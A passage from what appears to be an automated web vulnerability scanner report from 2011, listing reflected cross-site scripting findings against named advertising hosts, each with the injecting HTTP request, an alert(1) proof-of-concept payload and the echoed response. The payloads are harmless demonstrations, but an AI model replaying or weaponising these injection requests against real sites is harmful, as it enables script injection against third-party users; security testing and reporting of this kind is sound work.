The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 34070"%3balert(1)//d35023e459b was submitted in the mpvc parameter. This input was echoed as 34070";alert(1)//d35023e459b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/13754/86576/FINS_jobLogosV2_Blue_300x250.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F13754-86576-1281-0%3Fmpt%3D3602914&mpt=3602914&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b97/3/0/%2a/b%3B207642206%3B0-0%3B0%3B67183576%3B4307-300/250%3B33472683/33490561/1%3Bu%3D%2A%2A%2A%2A300x250%2C336x280%2A%2A%2A%2A%2A%2A%2A%2A%3B%7Eokv%3D%3Bu%3D%2A%2A%2A%2A300x250%2C336x280%2A%2A%2A%2A%2A%2A%2A%2A%3B%3Bmc%3Db2pfreezone%3Btile%3D3%3Bsz%3D300x250%2C336x280%3B%3B%7Eaopt%3D6/0/ff/0%3B%7Esscs%3D%3f34070"%3balert(1)//d35023e459b HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://blogs.wsj.com/static_html_files/jsframe.html?jsuri=http://ad.doubleclick.net/adj/bottom.interactive.wsj.com/blog_law;u=****300x250,336x280********;;mc=b2pfreezone;tile=3;sz=300x250,336x280;ord=2512251225122512;
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT; __qca=P0-2105999177-1315520268755; __utma=183366586.499222152.1315520229.1315520229.1315520229.1; __utmz=183366586.1315520229.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=mediaplex

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 21:13:53 GMT
Server: Apache
Last-Modified: Fri, 15 Jul 2011 17:55:15 GMT
ETag: "6fb685-f97-4a81f5a0b86c0"
Accept-Ranges: bytes
Content-Length: 5379
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
b97/3/0/*/b;207642206;0-0;0;67183576;4307-300/250;33472683/33490561/1;u=****300x250,336x280********;~okv=;u=****300x250,336x280********;;mc=b2pfreezone;tile=3;sz=300x250,336x280;;~aopt=6/0/ff/0;~sscs=?34070";alert(1)//d35023e459b");
mpvc = mpvclick;
}
else if (mpvce == 2) {
mpvclick2 = encodeURIComponent("http://ad.doubleclick.net/click;h=v8/3b97/3/0/*/b;207642206;0-0;0;67183576;4307-300/250;33472683/33490561/1;u=****300x250,3
...[SNIP]...

3.171. http://img.mediaplex.com/content/0/13754/86576/FINS_jobLogosV2_Blue_300x250.js [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/13754/86576/FINS_jobLogosV2_Blue_300x250.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload de2b7'%3balert(1)//e1aee509765 was submitted in the mpvc parameter. This input was echoed as de2b7';alert(1)//e1aee509765 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/13754/86576/FINS_jobLogosV2_Blue_300x250.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F13754-86576-1281-0%3Fmpt%3D3602914&mpt=3602914&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b97/3/0/%2a/b%3B207642206%3B0-0%3B0%3B67183576%3B4307-300/250%3B33472683/33490561/1%3Bu%3D%2A%2A%2A%2A300x250%2C336x280%2A%2A%2A%2A%2A%2A%2A%2A%3B%7Eokv%3D%3Bu%3D%2A%2A%2A%2A300x250%2C336x280%2A%2A%2A%2A%2A%2A%2A%2A%3B%3Bmc%3Db2pfreezone%3Btile%3D3%3Bsz%3D300x250%2C336x280%3B%3B%7Eaopt%3D6/0/ff/0%3B%7Esscs%3D%3fde2b7'%3balert(1)//e1aee509765 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://blogs.wsj.com/static_html_files/jsframe.html?jsuri=http://ad.doubleclick.net/adj/bottom.interactive.wsj.com/blog_law;u=****300x250,336x280********;;mc=b2pfreezone;tile=3;sz=300x250,336x280;ord=2512251225122512;
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT; __qca=P0-2105999177-1315520268755; __utma=183366586.499222152.1315520229.1315520229.1315520229.1; __utmz=183366586.1315520229.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=mediaplex

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 21:13:55 GMT
Server: Apache
Last-Modified: Fri, 15 Jul 2011 17:55:15 GMT
ETag: "6fb685-f97-4a81f5a0b86c0"
Accept-Ranges: bytes
Content-Length: 5379
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
b97/3/0/*/b;207642206;0-0;0;67183576;4307-300/250;33472683/33490561/1;u=****300x250,336x280********;~okv=;u=****300x250,336x280********;;mc=b2pfreezone;tile=3;sz=300x250,336x280;;~aopt=6/0/ff/0;~sscs=?de2b7';alert(1)//e1aee509765http://altfarm.mediaplex.com/ad/ck/13754-86576-1281-0?mpt=3602914" target="_blank">
...[SNIP]...

3.172. http://installer.mpx.theplatform.com/installers/mpxUploader.air [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://installer.mpx.theplatform.com
Path:   /installers/mpxUploader.air

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c9107<script>alert(1)</script>2a640559b36 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /installers/mpxUploader.airc9107<script>alert(1)</script>2a640559b36 HTTP/1.1
Host: installer.mpx.theplatform.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Content-Length: 1432
Content-Type: text/html; charset=iso-8859-1
Server: Jetty(6.1.19)
Expires: Wed, 05 Oct 2011 19:32:24 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 05 Oct 2011 19:32:24 GMT
Connection: close

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"/>
<title>Error 404 NOT_FOUND</title>
</head>
<body><h2>HTTP ERROR 404</h2>
<p>Problem accessing /installers/mpxUploader.airc9107<script>alert(1)</script>2a640559b36. Reason:
<pre>
...[SNIP]...

3.173. http://iv.doubleclick.net/pfadx/nbcu.lim.ny/131129433_undefined_weather_ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://iv.doubleclick.net
Path:   /pfadx/nbcu.lim.ny/131129433_undefined_weather_

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 9c3ff<script>alert(1)</script>4fed174e67 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pfadx/nbcu.lim.ny/131129433_undefined_weather_9c3ff<script>alert(1)</script>4fed174e67;dcmt=text/html;!category=ny;!category=weather;!category=;site=ny;sect=weather;sub=;pid=undefined;contentid=2148282776;contentgroup=null;env=;tile=16;pt=;pos=16;sz=60x120;ord=444512866 HTTP/1.1
Host: iv.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.nbcnewyork.com/pdk442/pdk/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 1819
DCLK_imp: v7;x;242653273;0-0;0;25398738;60/120;42965716/42983503/1;;~aopt=6/0/ff/0;~okv=;dcmt=text/html;!category=ny;!category=weather;!category=;site=ny;sect=weather;sub=;pid=undefined;contentid=2148282776;contentgroup=null;env=;tile=16;pt=;pos=16;sz=60x120;~cs=t
Date: Wed, 05 Oct 2011 18:24:30 GMT

<!-- Template ID = 16798 Template Name = LIM - Acudeo - Tremor US Network - Overlay Version 1.24 -->

<?xml version="1.0" encoding="UTF-8"?>
       <AcudeoWrapper Version="1.24">
        <AdTag AdSystem="Tremo
...[SNIP]...
<URL>http://iv.doubleclick.net/pfadx/nbcu.lim.ny/131129433_undefined_weather_9c3ff<script>alert(1)</script>4fed174e67;sz=1x1;dcmt=text/xml;ord=4429482?</URL>
...[SNIP]...

3.174. http://js.revsci.net/gateway/gw.js [csid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload ffca8<script>alert(1)</script>368431c84a6 was submitted in the csid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/gw.js?csid=K05540ffca8<script>alert(1)</script>368431c84a6 HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cb